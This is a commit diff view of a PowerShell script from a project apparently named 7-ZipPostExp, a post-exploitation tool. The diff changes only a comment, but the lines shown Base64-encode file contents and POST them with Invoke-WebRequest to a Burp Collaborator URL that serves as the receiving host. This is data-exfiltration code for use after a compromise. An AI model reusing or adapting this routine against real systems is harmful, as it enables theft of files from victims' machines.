Projects STRLCPY 7-ZipPostExp Commits 48c91b9f
🤬
  • ■ ■ ■ ■
    7zipPostExp.ps1
    skipped 20 lines
    21 21   $filecontentbytes = [System.Text.Encoding]::UTF8.GetBytes($filecontent)
    22 22   $B64EncodedContent = [System.Convert]::ToBase64String($filecontentbytes)
    23 23  
    24  - $target = "https://fo70z55wxi56zxob33p9oiq8hznpbe.burpcollaborator.net" #CHANGE ME
     24 + $target = "https://fo70z55wxi56zxob33p9oiq8hznpbe.burpcollaborator.net" #CHANGE URL
    25 25   $postParams = @{payload=$B64EncodedContent}
    26 26   Invoke-WebRequest -Uri $target -Method POST -Body $postParams
    27 27  
    skipped 10 lines
Please wait...
Page is in error, reload to recover